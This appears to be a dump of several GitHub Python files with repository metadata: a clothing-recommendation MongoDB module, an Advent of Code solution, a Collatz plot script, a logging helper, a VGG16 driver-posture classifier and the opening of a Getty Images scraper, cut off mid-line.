db.user_ssafit.find_one({'userId': int(userId), 'largecategory': largecategory})\n color_list = []\n color_exist = False\n for idx, col in enumerate(user):\n if col=='colorWhite':\n color_list.append([col, user[col]])\n color_exist = True\n elif color_exist and col!='colorOthers' and 'color' in col:\n color_list.append([col, user[col]])\n elif col=='colorOthers':\n color_list.append([col, user[col]])\n break\n color_list = sorted(color_list, key=lambda x: x[1], reverse=True)\n color_li = []\n for i in range(0, 3):\n color_li.append(color_list[i][0])\n exist = False\n for i in np.arange(0.1, 1.1, 0.1):\n for one_user in db.user.aggregate([{'$match': {'largecategory': user['largecategory'], color_li[0]: {\"$gte\": user[color_li[0]]-i, \"$lte\": user[color_li[0]]+i},color_li[1]: {\"$gte\": user[color_li[1]]-i, \"$lte\": user[color_li[1]]+i},color_li[2]: {\"$gte\": user[color_li[2]]-i, \"$lte\": user[color_li[2]]+i}}}]):\n users.add(one_user['userId'])\n if len(users) == 3:\n exist = True\n break\n if exist:\n break\n return list(users)\n\ndef get_style_user_info(userId, largecategory):\n users = set()\n user = db.user_ssafit.find_one({'userId': int(userId), 'largecategory': largecategory})\n exist = False\n for i in range(0, 4, 1):\n for one_user in db.user.aggregate([{'$match': {'largecategory': user['largecategory'], 'size': {\"$gte\": user['size']-i, \"$lte\": user['size']+i}, 'bright': {\"$gte\": user['bright']-i, \"$lte\": user['bright']+i}, 'color': {\"$gte\": user['color']-i, \"$lte\": user['color']+i}, 'thickness': {\"$gte\": user['thickness']-i, \"$lte\": user['thickness']+i}}},{'$sample': {'size':1}}]):\n users.add(one_user['userId'])\n if len(users) == 3:\n exist = True\n break\n if exist:\n break\n return list(users)\n\n\ndef get_category_user_info(userId, largecategory):\n user = db.user_ssafit.find_one({'userId': int(userId), 'largecategory': largecategory})\n users = set()\n if largecategory == 1:\n category_list = []\n for idx, cat in enumerate(user):\n if 'smallCategory' in cat:\n category_list.append([cat, user[cat]])\n category_list = sorted(category_list, key=lambda x: x[1], reverse=True)\n category_li = []\n for i in range(0, 3):\n category_li.append(category_list[i][0])\n elif largecategory == 2:\n category_list = []\n for idx, cat in enumerate(user):\n if 'smallCategory' in cat:\n category_list.append([cat, user[cat]])\n category_list = sorted(category_list, key=lambda x: x[1], reverse=True)\n category_li = []\n for i in range(0, 3):\n category_li.append(category_list[i][0])\n elif largecategory == 3:\n category_list = []\n for idx, cat in enumerate(user):\n if 'smallCategory' in cat:\n category_list.append([cat, user[cat]])\n category_list = sorted(category_list, key=lambda x: x[1], reverse=True)\n category_li = []\n for i in range(0, 3):\n category_li.append(category_list[i][0])\n elif largecategory == 4:\n category_li = ['smallCategoryMinidress', 'smallCategoryMidi', 'smallCategoryMaxidress']\n elif largecategory == 5:\n category_li = ['smallCategoryMiniskirt', 'smallCategoryMidi', 'smallCategoryLongskirt']\n exist = False\n for i in np.arange(0.1, 1, 0.1):\n for one_user in db.user.aggregate([{'$match': {'largecategory': user['largecategory'], category_li[0]: {\"$gte\": user[category_li[0]]-i, \"$lte\": user[category_li[0]]+i},category_li[1]: {\"$gte\": user[category_li[1]]-i, \"$lte\": user[category_li[1]]+i},category_li[2]: {\"$gte\": user[category_li[2]]-i, \"$lte\": user[category_li[2]]+i}}},{'$sample': {'size':1}}]):\n users.add(one_user['userId'])\n if len(users) == 3:\n exist = True\n break\n if exist:\n break\n return list(users)\n\n\ndef get_cloth(idList):\n if type(idList) == int:\n cloth = db.cloth.find_one({'newClothId': int(idList)}, {'_id': 0})\n return cloth\n else:\n clothes = []\n for cloth_id in idList:\n cloth = db.cloth.find_one({'newClothId': int(cloth_id)}, {'_id': 0})\n clothes.append(cloth_helper(cloth))\n return clothes\n \ndef get_user_gender(userId):\n user = db.user_ssafit.find_one({'userId': int(userId)})\n return user['userMale']\n\ndef get_cloth_gender(newClothId):\n user = db.cloth.find_one({'newClothId': int(newClothId)})\n return user['clothMale']\n\ndef get_user_height_weight(userId):\n user = db.user_ssafit.find_one({'userId': int(userId)})\n result = [user['userHeight'], user['userWeight']]\n return result\n\ndef get_cloth_height_weight(newClothId):\n cloth = db.cloth.find_one({'newClothId': int(newClothId)})\n result = [cloth['userHeight'], cloth['userWeight']]\n return result\n\ndef get_codi(codiTPO):\n codis = []\n for codi in db.codi.aggregate([{'$project': {\"_id\": 0}}, {'$match':{f'{codiTPO}': int(1)}},{'$sample': {'size':20}}]):\n codis.append(codi)\n return codis\n\n\ndef get_codi_detail(codiId):\n codi = db.codi.find_one({'codiId': int(codiId)}, {'_id': 0})\n return codi\n\n\ndef get_reviews(newClothId):\n reviews = []\n for review in db.review.aggregate([{'$project': {\"_id\": 0}}, {'$match': {'newGoodsNo': int(newClothId)}}, {'$sort': {'date': -1}}]):\n reviews.append(review)\n return reviews\n\ndef get_img_reviews(newClothId: int, userId: int):\n review_list = []\n user = db.user_ssafit.find_one({'userId': userId}, {'_id': 0})\n for review in db.review.aggregate([{'$match': {'newGoodsNo': int(newClothId), 'reviewStyle': 1}}]):\n review_list.append([review['userHeight'], review['userWeight'], review['reviewId']])\n for i in range(len(review_list)):\n review_list[i][0] = review_list[i][0] - user['userHeight']\n review_list[i][1] = review_list[i][1] - user['userWeight']\n review_list = sorted(review_list, key=lambda x: x[0]+x[1])\n re_list = []\n for j in range(len(review_list)):\n if j == 10:\n break\n re_list.append(review_list[j][2])\n reviews = []\n for i in re_list:\n reviews.append(db.review.find_one({\"reviewId\": i}, {\"_id\": 0}))\n return reviews\n\n# def get_brand_clothes(newClothId, userId):\n# cloth = db.cloth.find_one({'newClothId': newClothId})\n# user = db.user_ssafit.find_one({'userId': int(userId)})\n# brand_list = []\n# goods_id = set()\n# for brand in db.cloth.aggregate([{'$match': {'brand': cloth['brand']}}]):\n# if brand['clothId'] not in goods_id:\n# brand_list.append([brand['userHeight'], brand['userWeight'], brand['clothReviewCnt'], brand['newClothId']])\n# goods_id.add(brand['clothId'])\n# for i in range(len(brand_list)):\n# brand_list[i][0] = brand_list[i][0] - user['userHeight']\n# brand_list[i][1] = brand_list[i][1] - user['userWeight']\n# brand_list = sorted(brand_list, key=lambda x: (x[0]+x[1], x[2]))\n# br_list = []\n# for j in range(len(brand_list)):\n# if j == 6:\n# break\n# br_list.append(brand_list[j][3])\n# brands = []\n# for i in br_list:\n# brands.append(db.cloth.find_one({\"newClothId\": i}, {\"_id\": 0}))\n# return brands\n\ndef get_brand_clothes(newClothId: int):\n cloth = db.cloth.find_one({'newClothId': newClothId})\n if cloth['largeCategory']==1 or cloth['largeCategory']==2 or cloth['largeCategory']==3:\n transaction = db.transaction.find({'shopCnt': {'$gt': 1}, 'brand': cloth['brand']}, {'_id': 0, 'largecategory': 0})\n else:\n transaction = db.transaction.find({'brand': cloth['brand']}, {'_id': 0, 'largecategory': 0})\n transaction = list(transaction)\n transaction = pd.DataFrame(transaction)\n if 10 <= len(transaction):\n if len(transaction) >= 1000:\n a = transaction[transaction.newClothId==newClothId]\n transaction = transaction.sample(n=1000)\n transaction = pd.concat([transaction, a])\n transaction = transaction.drop_duplicates(['userId', 'newClothId'])\n trans = transaction.pivot_table(index='newClothId', columns='userId', values='shopCnt')\n trans.fillna(0, inplace=True)\n SVD = TruncatedSVD(n_components=10)\n SVD_matrix = SVD.fit_transform(trans)\n corr = np.corrcoef(SVD_matrix)\n corr = pd.DataFrame(data=corr, index=trans.index, columns=trans.index)\n corr_list = corr[cloth['newClothId']].sort_values(ascending=False)[:50].index\n else:\n corr_list = list(transaction.newClothId)\n result = []\n sub = set()\n sub.add(cloth['clothId'])\n cnt = 0\n for clothId in corr_list:\n sub_cloth = db.cloth.find_one({'newClothId': clothId}, {'_id': 0})\n if cnt == 0:\n result.append(sub_cloth)\n sub.add(sub_cloth['clothId'])\n cnt += 1\n elif cnt != 0 and sub_cloth['clothId'] not in sub:\n result.append(sub_cloth)\n sub.add(sub_cloth['clothId'])\n cnt += 1\n if cnt == 6:\n break\n return result\n\ndef get_similar_clothes(newClothId: int):\n cloth = db.cloth.find_one({'newClothId': newClothId})\n if cloth['largeCategory']==1 or cloth['largeCategory']==2 or cloth['largeCategory']==3:\n transaction = db.transaction.find({'shopCnt': {'$gt': 1}, 'smallCategoryName': cloth['smallCategoryName'], 'colorName': cloth['colorName']}, {'_id': 0, 'largecategory': 0})\n else:\n transaction = db.transaction.find({'smallCategoryName': cloth['smallCategoryName'], 'colorName': cloth['colorName']}, {'_id': 0, 'largecategory': 0})\n transaction = list(transaction)\n transaction = pd.DataFrame(transaction)\n if len(transaction) >= 10:\n if len(transaction) >= 1000:\n a = transaction[transaction.newClothId==newClothId]\n transaction = transaction.sample(n=1000)\n transaction = pd.concat([transaction, a])\n transaction = transaction.drop_duplicates(['userId', 'newClothId'])\n trans = transaction.pivot(index='newClothId', columns='userId', values='shopCnt')\n trans.fillna(0, inplace=True)\n SVD = TruncatedSVD(n_components=10)\n SVD_matrix = SVD.fit_transform(trans)\n corr = np.corrcoef(SVD_matrix)\n corr = pd.DataFrame(data=corr, index=trans.index, columns=trans.index)\n corr_list = corr[cloth['newClothId']].sort_values(ascending=False)[1:50].index\n else:\n corr_list = list(transaction.newClothId)\n result = []\n sub = set()\n sub.add(cloth['clothId'])\n cnt = 0\n for clothId in corr_list:\n sub_cloth = db.cloth.find_one({'newClothId': clothId}, {'_id': 0})\n if cnt == 0:\n result.append(sub_cloth)\n sub.add(sub_cloth['clothId'])\n cnt += 1\n else:\n if sub_cloth['clothId'] not in sub:\n result.append(sub_cloth)\n sub.add(sub_cloth['clothId'])\n cnt += 1\n if cnt == 6:\n break\n return result\n\n\ndef get_cloth_by_user_info(clothId, userId):\n user = db.user_ssafit.find_one({'userId':int(userId)})\n newClothId = ''\n exist = False\n \n for i in range(30):\n for cloth in db.cloth.aggregate([{'$project': {\"_id\": 0}},{'$match': {'clothId': int(clothId), 'userHeight': {'$in': list(range(user['userHeight']-i, user['userHeight']+i))}, 'userWeight': {'$in': list(range(user['userWeight']-i, user['userWeight']+i))}}}]):\n newClothId = cloth['newClothId']\n if newClothId:\n exist = True\n break\n if exist:\n break\n return newClothId\n\ndef change_user_info(userId, newClothId, num):\n cloth = get_cloth(newClothId)\n largecategory = cloth['largeCategory']\n smallCategorySelect = ''\n style = ['size', 'bright', 'color', 'thickness']\n colorSelect = ''\n for idx, col in enumerate(cloth):\n if 'smallCategory' in col and cloth[col] == 1:\n smallCategorySelect = col\n elif col != 'color' and 'color' in col and cloth[col] == 1:\n colorSelect = col\n \n col_list = ['size', 'bright', 'color', 'thickness', 'colorWhite', \n 'colorGrey', 'colorBlack', 'colorRed', 'colorPink', 'colorOrange', 'colorIvory', 'colorYellow',\n 'colorGreen', 'colorBlue', 'colorPurple', 'colorBrown', 'colorBeige', 'colorJean', 'colorPattern', 'colorOthers', \n 'smallCategoryHalfshort', 'smallCategoryShirt', 'smallCategoryCollar',\n 'smallCategoryHoody', 'smallCategorySweatshirt', 'smallCategoryKnit',\n 'smallCategoryLong', 'smallCategoryShort', 'smallCategoryOthers',\n 'smallCategoryHoodie', 'smallCategoryBlouson', 'smallCategoryRiders', 'smallCategoryMustang', \n 'smallCategoryCardigan', 'smallCategoryFleece', 'smallCategoryCoat', 'smallCategoryPaddedcoat', 'smallCategoryVest', 'smallCategoryJacket',\n 'smallCategoryDenimpants', 'smallCategoryCottonpants', 'smallCategorySlacks',\n 'smallCategoryJoggerpants', 'smallCategoryShortpants', 'smallCategoryLeggings', 'smallCategoryJumpsuit',\n 'smallCategoryMinidress', 'smallCategoryMidi', 'smallCategoryMaxidress',\n 'smallCategoryMiniskirt', 'smallCategoryLongskirt']\n\n\n user = db.user_ssafit.find_one({'userId': int(userId), 'largecategory': largecategory})\n if num == 1:\n for idx, cat in enumerate(user):\n # 모든 성분 * viewCnt\n if cat in col_list:\n user[cat] *= user['viewCnt']\n if cat == smallCategorySelect:\n user[cat] += 1\n elif cat == colorSelect:\n user[cat] += 1\n elif cat in style:\n user[cat] += cloth[cat]\n db.user_ssafit.update_one({'userId': int(userId), 'largecategory': largecategory}, {'$set': {'viewCnt': user['viewCnt'], cat: user[cat]}})\n \n # viewCnt += 1\n user['viewCnt'] += 1\n\n for idx, cat in enumerate(user):\n # 모든 성분 / viewCnt\n if cat in col_list:\n user[cat] /= user['viewCnt']\n db.user_ssafit.update_one({'userId': int(userId), 'largecategory': largecategory}, {'$set': {'viewCnt': user['viewCnt'], cat: user[cat]}})\n \n # 좋아요 취소\n elif num == 2:\n for idx, cat in enumerate(user):\n # 모든 성분 * viewCnt\n if cat in col_list:\n user[cat] *= user['viewCnt']\n if cat == smallCategorySelect and user[cat] >= 1:\n user[cat] -= 1\n elif cat == colorSelect and user[cat] >= 1:\n user[cat] -= 1\n elif cat in style and user[cat]:\n user[cat] -= cloth[cat]\n if user[cat] < 0:\n user[cat] = 0\n db.user_ssafit.update_one({'userId': int(userId), 'largecategory': largecategory}, {'$set': {'viewCnt': user['viewCnt'], cat: user[cat]}})\n\n user['viewCnt'] -= 1\n if user['viewCnt'] == 0:\n for idx, cat in enumerate(user):\n if cat in col_list:\n user[cat] = 0\n db.user_ssafit.update_one({'userId': int(userId), 'largecategory': largecategory}, {'$set': {'viewCnt': user['viewCnt'], cat: user[cat]}})\n else:\n for idx, cat in enumerate(user):\n # 모든 성분 / viewCnt\n if cat in col_list:\n user[cat] /= user['viewCnt']\n db.user_ssafit.update_one({'userId': int(userId), 'largecategory': largecategory}, {'$set': {'viewCnt': user['viewCnt'], cat: user[cat]}})\n return\n\n\ndef get_recent_items(userId):\n user = db.user_ssafit.find_one({'userId':int(userId), 'largecategory': 1}, {'_id': 0})\n try:\n clothes = []\n result = user['recentItems']\n for cloth_id in result:\n cloth = db.cloth.find_one({'newClothId': cloth_id}, {'_id': 0})\n clothes.append(cloth_helper(cloth))\n return clothes\n except:\n return []\n\n\ndef change_recent_item(userId, newClothId):\n cloth = get_cloth(newClothId)\n user = db.user_ssafit.find_one({'userId': int(userId), 'largecategory': 1}, {'_id': 0})\n try:\n if newClothId in user['recentItems']:\n user['recentItems'].remove(newClothId)\n user['recentItems'].insert(0, newClothId)\n elif newClothId not in user['recentItems'] and len(user['recentItems']) < 5:\n user['recentItems'].insert(0, newClothId)\n elif newClothId not in user['recentItems'] and len(user['recentItems']) == 5:\n user['recentItems'].pop()\n user['recentItems'].insert(0, newClothId)\n db.user_ssafit.update_one({'userId': int(userId), 'largecategory': 1}, {'$set': {'recentItems': user['recentItems']}})\n\n except:\n db.user_ssafit.update_one({'userId': int(userId), 'largecategory': 1}, {'$set': {'recentItems': list()}})\n users = db.user_ssafit.find_one({'userId': int(userId), 'largecategory': 1}, {'_id': 0})\n users['recentItems'].append(newClothId)\n db.user_ssafit.update_one({'userId': int(userId), 'largecategory': 1}, {'$set': {'recentItems': users['recentItems']}})\n return\n\ndef change_img():\n a = \"//image.msscdn.net/images/goods_img/20210127/1765993/1765993_2_500.jpg\"\n b = \"//image.msscdn.net/images/goods_img/20210127/1765993/1765993_3_500.jpg\"\n clothes = db.cloth.find({'clothImg': a})\n for cloth in clothes:\n db.cloth.update_one({'clothImg': a}, {'$set': {'clothImg': b}})","repo_name":"yoonjung1205/SSAFit","sub_path":"data/app/database/database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":19592,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"35335676689","text":"# https://adventofcode.com/2021/day/6\n\ndef parse(raw):\n days = [0] * 9\n for x in map(int, raw.split(',')):\n days[x] += 1\n return days\n\ndef step(days):\n days.append( days.pop(0) )\n days[6] += days[-1]\n return days\n\ndef exp(days, n=80):\n days = days[:]\n for _ in range(n):\n days = step(days)\n return sum(days)\n\nTEST = '3,4,3,1,2'\n\nif __name__ == '__main__':\n assert exp(parse(TEST)) == 5934\n assert exp(parse(TEST), 256) == 26984457539\n\n days = parse(open('data/day06.in').read())\n print(exp(days), exp(days, 256))","repo_name":"andy1li/adventofcode","sub_path":"2021/day06_exp.py","file_name":"day06_exp.py","file_ext":"py","file_size_in_byte":565,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"73249687130","text":"\"\"\"\nSimple Logging system for Python.\n\n- `logger.log(log, opt: path, opt: log_format)` - meant to be used for loggin info to the log file.\n- `logger.warning(log, opt: path, opt: log_format)` - meant to be used for logging any warnings to the log file.\n- `logger.error(log, opt: path, opt: log_format)` - meant to be used for logging any errors to the log file.\n- `logger.debug(log, opt:path, opt: log_format)` - meant to be used for logging any debug info to the log file.\n- `logger.mkfile(opt: path, opt: log_format)` - meant to be used to create the log file if it doesn't exist.\n\nExample Usage:\n```python\nimport logger\n\ndef foo(x):\n ...\n\ntry:\n foo(x)\nexcept Exception as e:\n logger.error(e)\n\"\"\"\n\nimport time\nimport os\n\nfrom typing import Union\n\n\ndef mkfile(path: str = \"logs\", log_format: str = \"%Y-%m-%d\"):\n \"\"\"\n Creates the log directory and the log file if it doesn't exist.\n \"\"\"\n if not os.path.exists(path):\n os.mkdir(path)\n\n if not os.path.exists(f\"{path}/{time.strftime(log_format)}.txt\"):\n os.mknod(f\"{path}/{time.strftime(log_format)}.txt\")\n\n\ndef log(log: Union[str, Exception], path: str = \"logs\", log_format: str = \"%Y-%m-%d\"):\n \"\"\"\n Use this function to show LOG information.\n \"\"\"\n mkfile(path)\n\n with open(f\"{path}/{time.strftime(log_format)}.txt\", \"a\") as f:\n f.write(f'{time.strftime(\"LOG %H:%M:%S\")} {log}\\n')\n\n\ndef warning(\n log: Union[str, Exception], path: str = \"logs\", log_format: str = \"%Y-%m-%d\"\n):\n \"\"\"\n Use this function to show WARNING information.\n \"\"\"\n mkfile(path)\n\n with open(f\"{path}/{time.strftime(log_format)}.txt\", \"a\") as f:\n f.write(f'{time.strftime(\"WARNING %H:%M:%S\")} {log}\\n')\n\n\ndef error(log: Union[str, Exception], path: str = \"logs\"):\n \"\"\"\n Use this function to show ERROR information.\n \"\"\"\n mkfile(path)\n\n with open(f'{path}/{time.strftime(\"%Y-%m-%d\")}.txt', \"a\") as f:\n f.write(f'{time.strftime(\"ERROR %H:%M:%S\")} {log}\\n')\n\n\ndef debug(log: Union[str, Exception], path: str = \"logs\", log_format: str = \"%Y-%m-%d\"):\n \"\"\"\n Use this function to show DEBUG information.\n \"\"\"\n mkfile(path)\n\n with open(f\"{path}/{time.strftime(log_format)}.txt\", \"a\") as f:\n f.write(f'{time.strftime(\"DEBUG %H:%M:%S\")} {log}\\n')\n","repo_name":"KotonBads/todo-list","sub_path":"logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":2283,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"37366728821","text":"import tensorflow as tf\nimport numpy as np\nfrom keras.preprocessing.image import ImageDataGenerator, img_to_array, load_img\nfrom keras.models import Sequential\nfrom keras import optimizers\nfrom keras.layers import Dropout, Flatten, Dense\nfrom keras import applications\nfrom keras.utils.np_utils import to_categorical\nimport matplotlib.pyplot as plt\nimport math\nimport cv2\nimport os\nimport sys\nimport json\nimport requests\n#import pygame\n#from keras.models import \n\n\n#gpu_options = tf.GPUOptions(per_process_gpu_memory_fraction=0.95, allow_growth=True) \n#sess = tf.Session(config=tf.ConfigProto(log_device_placement=True, allow_soft_placement=True, gpu_options=gpu_options))\n\n\n# dimensions of our images.\nimg_width, img_height = 224, 224\ntop_model_weights_path = 'bottleneck_fc_model.h5'\ntrain_data_dir = 'data/train/'\nvalidation_data_dir = 'data/validation/'\n\n# number of epochs to train top model\nepochs = 10\n# batch size used by flow_from_directory and predict_generator\nbatch_size = 3\n\n\ndef save_bottlebeck_features():\n # build the VGG16 network\n model = applications.VGG16(include_top=False, weights='imagenet')\n print(model.summary())\n\n datagen = ImageDataGenerator(rescale=1. / 255)\n\n generator = datagen.flow_from_directory(\n train_data_dir,\n target_size=(img_width, img_height),\n batch_size=batch_size,\n class_mode=None,\n shuffle=False)\n\n #print(len(generator.filenames))\n #print(generator.class_indices)\n #print(len(generator.class_indices))\n\n nb_train_samples = len(generator.filenames)\n num_classes = len(generator.class_indices)\n\n predict_size_train = int(math.ceil(nb_train_samples / batch_size))\n\n bottleneck_features_train = model.predict_generator(\n generator, predict_size_train)\n\n np.save('bottleneck_features_train.npy', bottleneck_features_train)\n\n generator = datagen.flow_from_directory(\n validation_data_dir,\n target_size=(img_width, img_height),\n batch_size=batch_size,\n class_mode=None,\n shuffle=False)\n\n nb_validation_samples = len(generator.filenames)\n\n predict_size_validation = int(\n math.ceil(nb_validation_samples / batch_size))\n\n bottleneck_features_validation = model.predict_generator(\n generator, predict_size_validation)\n\n np.save('bottleneck_features_validation.npy',\n bottleneck_features_validation)\n\n\ndef train_top_model():\n datagen_top = ImageDataGenerator(rescale=1. / 255)\n generator_top = datagen_top.flow_from_directory(\n train_data_dir,\n target_size=(img_width, img_height),\n batch_size=batch_size,\n class_mode='categorical',\n shuffle=False)\n\n nb_train_samples = len(generator_top.filenames)\n num_classes = len(generator_top.class_indices)\n\n # save the class indices to use use later in predictions\n np.save('class_indices.npy', generator_top.class_indices)\n\n # load the bottleneck features saved earlier\n train_data = np.load('bottleneck_features_train.npy')\n\n # get the class lebels for the training data, in the original order\n train_labels = generator_top.classes\n\n # https://github.com/fchollet/keras/issues/3467\n # convert the training labels to categorical vectors\n train_labels = to_categorical(train_labels, num_classes=num_classes)\n\n generator_top = datagen_top.flow_from_directory(\n validation_data_dir,\n target_size=(img_width, img_height),\n batch_size=batch_size,\n class_mode='categorical',\n shuffle=False)\n\n nb_validation_samples = len(generator_top.filenames)\n\n validation_data = np.load('bottleneck_features_validation.npy')\n\n validation_labels = generator_top.classes\n validation_labels = to_categorical(\n validation_labels, num_classes=num_classes)\n\n model = Sequential()\n model.add(Flatten(input_shape=train_data.shape[1:]))\n\n# model.add(Flatten(input_shape=(224,224,3)))\n model.add(Dense(256, activation='relu'))\n model.add(Dropout(0.5))\n model.add(Dense(num_classes, activation='softmax'))\n\n model.compile(optimizer=optimizers.Adam(lr=0.0001),\n loss='categorical_crossentropy', metrics=['accuracy'])\n\n history = model.fit(train_data, train_labels,\n epochs=epochs,\n batch_size=batch_size,\n validation_data=(validation_data, validation_labels))\n\n model.save_weights(top_model_weights_path)\n\n (eval_loss, eval_accuracy) = model.evaluate(\n validation_data, validation_labels, batch_size=batch_size, verbose=1)\n \n\n print(\"[INFO] accuracy: {:.2f}%\".format(eval_accuracy * 100))\n print(\"[INFO] Loss: {}\".format(eval_loss))\n \n \n\n\n plt.figure(1)\n\n # summarize history for accuracy\n\n plt.subplot(211)\n plt.plot(history.history['acc'])\n plt.plot(history.history['val_acc'])\n plt.title('model accuracy')\n plt.ylabel('accuracy')\n plt.xlabel('epoch')\n plt.legend(['train', 'test'], loc='upper left')\n\n # summarize history for loss\n\n plt.subplot(212)\n plt.plot(history.history['loss'])\n plt.plot(history.history['val_loss'])\n plt.title('model loss')\n plt.ylabel('loss')\n plt.xlabel('epoch')\n plt.legend(['train', 'test'], loc='upper left')\n plt.show()\n\n\n \n \n\ndef predict(image_path, asset_id):\n # load the class_indices saved in the earlier step\n class_dictionary = np.load('class_indices.npy').item()\n\n num_classes = len(class_dictionary)\n\n \n# orig = cv2.imread(image_path, 1)\n# cv2.imshow(\"Actual\", orig)\n# cv2.waitKey(1000)\n\n print(\"[INFO] loading and preprocessing image...\")\n image = load_img(image_path, target_size=(224, 224))\n image = img_to_array(image)\n\n # important! otherwise the predictions will be '0'\n image = image / 255\n\n image = np.expand_dims(image, axis=0)\n\n # build the VGG16 network\n model = applications.VGG16(include_top=False, weights='imagenet')\n\n # get the bottleneck prediction from the pre-trained VGG16 model\n bottleneck_prediction = model.predict(image)\n\n # build top model\n model = Sequential()\n model.add(Flatten(input_shape=bottleneck_prediction.shape[1:]))\n# model.add(Flatten(input_shape=(224,224,3)))\n model.add(Dense(256, activation='relu'))\n model.add(Dropout(0.5))\n model.add(Dense(num_classes, activation='softmax'))\n\n model.load_weights(top_model_weights_path)\n\n # use the bottleneck prediction on the top model to get the final\n # classification\n class_predicted = model.predict_classes(bottleneck_prediction)\n\n probabilities = model.predict_proba(bottleneck_prediction)\n\n inID = class_predicted[0]\n\n inv_map = {v: k for k, v in class_dictionary.items()}\n\n label = inv_map[inID]\n\n #request to pega\n url = 'http://192.168.2.124:8080/prweb/PRHTTPService/AIServicePackage/Services/ProcessData'\n payload = json.dumps({\"asset_id\" : asset_id, \"prediction\" : label});\n print(payload)\n #headers = {'content-type': 'application/json'}\n #response = requests.post(url, data=payload, headers=headers)\n\n \n #display the predictions with the image\n# out = cv2.imread(image_path, 1)\n\n# cv2.putText(out, \"Predicted: {}\".format(label), (10, 30),\n# cv2.FONT_HERSHEY_PLAIN, 1.5, (43, 99, 255), 2)\n\n \n \n# cv2.imshow(\"Prediction\", out)\n# cv2.moveWindow(\"Prediction\", 700, 0)\n# cv2.waitKey(1000)\n# cv2.destroyAllWindows()\n \n\n \n\n\n\ndef pred_util(): \n\n walk_dir = \"./data/test/\"\n\n print('walk_dir = ' + walk_dir)\n\n print('walk_dir (absolute) = ' + os.path.abspath(walk_dir))\n\n for root, subdirs, files in os.walk(walk_dir):\n asset_id = os.path.basename(root);\n if (asset_id[:4]!=\"pega\"):\n continue\n print('--\\nroot = ' + asset_id)\n\n\n for filename in files:\n file_path = os.path.join(root, filename)\n predict(file_path, asset_id)\n \n print('\\t- file %s (full path: %s)' % (filename, file_path))\n \n\n\n\n \nsave_bottlebeck_features()\ntrain_top_model()\npred_util()\n# cv2.destroyAllWindows()\n\n\n\n\n\n\n","repo_name":"ajaysh2193/Driver-Posture-and-Activity-Recognition","sub_path":"poc.py","file_name":"poc.py","file_ext":"py","file_size_in_byte":8134,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"27215177138","text":"# importing the required module\nimport matplotlib.pyplot as plt\nimport numpy as np\n\n# x axis values\nxs = np.array([])\n# corresponding y axis values\nys = []\n\n\ndef apply(num):\n if (num % 2 == 0):\n return num / 2\n else:\n return num * 3 + 1\n\n\nfor y in range(1, 1000):\n counter = 0\n start = y\n while (start != 1):\n start = apply(start)\n print(start)\n ys[int(start)] +=1\n counter += 1\n if (y % 10000 == 0):\n print(y, counter)\n \n\n# plotting the points\nprint(xs)\nprint(ys)\nplt.plot(ys)\n\n# naming the x axis\nplt.xlabel('x - axis')\n# naming the y axis\nplt.ylabel('y - axis')\n\n# giving a title to my graph\nplt.title('title')\n\n# function to show the plot\nplt.show()\n","repo_name":"mishimastar/w2wsolver","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":728,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"17501441881","text":"# Reformat CSV files from a folder\n# and create a new combined CSV\n\nimport os, re, codecs, subprocess\n\nfrom modules.file_system_functions import *\n\n\ndef run():\n print('Start')\n \n dir_path = 'c:/all'\n res_file_path = 'c:/00_ALL.csv'\n uuid_path = 'c:/uuids.txt'\n \n res_file = codecs.open(res_file_path, encoding='utf-8', mode='w')\n uuid_file = codecs.open(uuid_path, encoding='utf-8', mode='w')\n \n files_list = get_filepaths(dir_path)\n res_file.write('path;uuid\\n')\n \n total_lines = 0\n for fp in files_list:\n f = codecs.open(fp, encoding='utf-8', mode='r')\n for line in f:\n if line[0] != '\\t':\n parts = line.split(';')\n \n num_lines = int((len(parts)-1) / 3)\n total_lines += num_lines\n \n doc_item = []\n for part in parts:\n if len(doc_item) == 3:\n doc_item[2] = doc_item[2].replace('/ROOT_PATH/', '')\n doc = doc_item[2] + '/' + doc_item[0] + ';' + doc_item[1] + '\\n'\n res_file.write(doc)\n \n uuid_file.write(doc_item[1] + '\\n')\n doc_item = []\n \n part = part.strip()\n if len(part) != 0:\n doc_item.append(part)\n \n f.close()\n \n res_file.close()\n \n print('Finish, Total lines: ' + str(total_lines))\n \n \nrun()\n","repo_name":"mortalis13/PythonScripts","sub_path":"process_csv.py","file_name":"process_csv.py","file_ext":"py","file_size_in_byte":1297,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"14513806827","text":"import requests\nimport numpy as np\nimport csv\nimport random\nimport os\n\nfrom datetime import datetime\nfrom fake_useragent import UserAgent\nfrom tqdm import tqdm\nfrom bs4 import BeautifulSoup\n\nfrom .scrapping_utils import ScrappingUtils\n\nclass GettyImagesScrapper(ScrappingUtils):\n\n def __init__(self, num_pages, queries) -> None:\n super().__init__()\n self.num_pages = num_pages\n self.queries = queries\n\n def query_request(self, base_url, i):\n ua = UserAgent()\n headers = {'User-Agent':ua.random}\n succes_response = False\n while not succes_response:\n proxies = self.get_random_proxy()\n print(\"Trying with proxies: {}\".format(proxies))\n try:\n response = requests.get(base_url + '?page={0}'.format(i), headers=headers, proxies=proxies)\n if response.status_code == 200:\n succes_response = True\n except:\n random.randint(2, 10)\n return response\n \n def image_detail_request(self, detail_url):\n ua = UserAgent()\n headers = {'User-Agent':ua.random}\n succes_response = False\n while not succes_response:\n proxies = self.get_random_proxy()\n print(\"Trying with proxies: {}\".format(proxies))\n try:\n response = requests.get(detail_url, headers=headers, proxies=proxies)\n if response.status_code == 200:\n succes_response = True\n except:\n random.randint(2, 10)\n return response\n \n def parse_image_detail_html_data(self, response):\n soup = BeautifulSoup(response.content, \"html.parser\")\n caption_div_elem = soup.find(\"div\", {\"data-testid\":\"caption\"})\n\n if caption_div_elem:\n return caption_div_elem.contents\n \n def download_image(self, url):\n path = \"data/imgs/gettyimages/\"\n ppid = os.getpid()\n timestamp = datetime.now().timestamp()\n response = requests.get(url)\n if response.status_code == 200:\n if not 